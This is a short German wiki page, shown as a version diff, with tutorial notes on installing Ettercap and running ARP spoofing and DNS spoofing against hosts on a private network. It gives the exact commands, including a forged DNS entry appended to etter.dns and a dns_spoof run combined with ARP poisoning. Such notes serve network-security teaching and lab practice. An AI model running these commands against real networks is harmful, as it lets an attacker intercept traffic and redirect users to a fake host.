Ettercap: Unterschied zwischen den Versionen

Aus Xinux Wiki
Zur Navigation springen Zur Suche springen
Zeile 15: Zeile 15:
 
  /192.168.241.9//  =  Der "infizierte" Host
 
  /192.168.241.9//  =  Der "infizierte" Host
 
  /192.168.242.77/  =  Ziel
 
  /192.168.242.77/  =  Ziel
 
==DNSspoofig mit Ettercap==
 
echo "www.schmeich.de A 192.168.241.8" >> /etc/ettercap/etter.dns
 
 
ettercap -T -q -i eth0 -P dns_spoof -M arp /192.168.244.1// ///
 
 
'''optionen'''
 
-P dns_spoof        =  dns_spoof plugin
 
 
 
*http://www.tacticalcode.de/2012/05/its-tagebuch-tag-7-ettercap-filter-und-abschluss.html
 
 
 
 
 
 
 
http://openmaniak.com/ettercap_arp.php
 

Version vom 23. Oktober 2015, 10:49 Uhr

Installation unter Ubuntu oder Debian

apt-get install ettercap-graphical


Arpspoofig mit Ettercap

ettercap -Tq -i eth0 -M arp   /192.168.244.26,192.168.240.100// /192.168.240.100,192.168.244.26//


optionen
-i eth0            =   Interface
-T                 =   Textmodus
-q                 =   still 
-M arp             =   ARP Spoofing
/192.168.241.9//   =   Der "infizierte" Host
/192.168.242.77/   =   Ziel